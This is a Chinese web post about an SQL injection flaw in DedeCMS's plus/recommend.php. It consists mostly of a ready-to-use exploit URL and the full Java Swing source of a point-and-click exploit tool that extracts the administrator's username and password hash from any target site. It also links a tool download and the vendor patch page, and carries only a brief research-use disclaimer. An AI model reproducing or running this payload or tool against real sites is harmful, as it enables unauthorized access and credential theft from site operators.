dedecms即织梦(PHP开源网站内容管理系统)。织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统。
近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下: EXP: 复制代码代码如下: http://*.*.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\\’ or mid=@`\\\’` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\\\’`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111 直接获取就可以得到管理员的用户名与加密后的密码,效果如下图所示
利用工具源码(by 园长): 复制代码代码如下:package org.javaweb.dede.ui; import java.awt.Toolkit;import java.io.BufferedReader;import java.io.InputStreamReader;import java.net.URL;import java.util.regex.Matcher;import java.util.regex.Pattern; /** * * @author yz */public class MainFrame extends javax.swing.JFrame { private static final long serialVersionUID = 1L; /** * Creates new form MainFrame */ public MainFrame() { initComponents(); } public String request(String url){ String str = \”\”,tmp; try { BufferedReader br = new BufferedReader(new InputStreamReader(new URL(url).openStream())); while((tmp=br.readLine())!=null){ str+=tmp+\”\\r\\n\”; } } catch (Exception e) { jTextArea1.setText(e.toString()); } return str; } private void initComponents() { jPanel1 = new javax.swing.JPanel(); jLabel1 = new javax.swing.JLabel(); jTextField1 = new javax.swing.JTextField(); jButton1 = new javax.swing.JButton(); jScrollPane1 = new javax.swing.JScrollPane(); jTextArea1 = new javax.swing.JTextArea(); setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE); jLabel1.setText(\”URL:\”); jTextField1.setText(\”<a href=\”http://localhost\”>http://localhost</a>\”); this.setTitle(\”DedeCms recommend.php注入利用工具-p2j.cn\”); int screenWidth = Toolkit.getDefaultToolkit().getScreenSize().width; int screenHeight = Toolkit.getDefaultToolkit().getScreenSize().height; this.setBounds(screenWidth / 2 – 229, screenHeight / 2 – 158, 458, 316); jButton1.setText(\”获取\”); jButton1.addActionListener(new java.awt.event.ActionListener() { public void actionPerformed(java.awt.event.ActionEvent evt) { jButton1ActionPerformed(evt); } }); jTextArea1.setColumns(20); jTextArea1.setRows(5); jScrollPane1.setViewportView(jTextArea1); javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1); jPanel1.setLayout(jPanel1Layout); jPanel1Layout.setHorizontalGroup( jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(jPanel1Layout.createSequentialGroup() .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING, false) .addComponent(jScrollPane1, javax.swing.GroupLayout.Alignment.LEADING) .addGroup(javax.swing.GroupLayout.Alignment.LEADING, jPanel1Layout.createSequentialGroup() .addContainerGap() .addComponent(jLabel1) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) .addComponent(jTextField1, javax.swing.GroupLayout.PREFERRED_SIZE, 331, javax.swing.GroupLayout.PREFERRED_SIZE) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) .addComponent(jButton1, javax.swing.GroupLayout.PREFERRED_SIZE, 83, javax.swing.GroupLayout.PREFERRED_SIZE))) .addGap(0, 0, Short.MAX_VALUE)) ); jPanel1Layout.setVerticalGroup( jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(jPanel1Layout.createSequentialGroup() .addContainerGap() .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) .addComponent(jLabel1) .addComponent(jTextField1, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addComponent(jButton1)) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) .addComponent(jScrollPane1, javax.swing.GroupLayout.DEFAULT_SIZE, 254, Short.MAX_VALUE)) ); javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane()); getContentPane().setLayout(layout); layout.setHorizontalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE) ); layout.setVerticalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE) ); pack(); }// </editor-fold> private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) { String url = jTextField1.getText(); if(null==url||\”\”.equals(url)){ return ; } String result = request(url+\”/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\\\%27%20or%20mid=@`\\\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294\”); Matcher m = Pattern.compile(\”<h2>(.*)</h2>\”).matcher(result); if(m.find()){ String[] s = m.group(1).split(\”\\\\|\”); if(s.length>2){ jTextArea1.setText(\”UserName:\”+s[1]+\”\\r\\nMD5:\”+s[2].substring(3,s[2].length()-1)); } } } public static void main(String args[]) { java.awt.EventQueue.invokeLater(new Runnable() { public void run() { new MainFrame().setVisible(true); } }); } // Variables declaration – do not modify private javax.swing.JButton jButton1; private javax.swing.JLabel jLabel1; private javax.swing.JPanel jPanel1; private javax.swing.JScrollPane jScrollPane1; private javax.swing.JTextArea jTextArea1; private javax.swing.JTextField jTextField1; // End of variables declaration }利用工具下载地址 http://pan.baidu.com/s/1i37LUnF (本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!)
dedecms官方补丁地址: http://www.dedecms.com/pl/
![SQL注入攻防入门详解 [图文并茂] 附示例下载](https://www.u-9.cn/wp-content/themes/ceomax-pro/timthumb.php?src=https://www.u-9.cn/wp-content/uploads/2023/12/2023120410122655.png&h=200&w=300&zc=1&a=t&q=100&s=1)
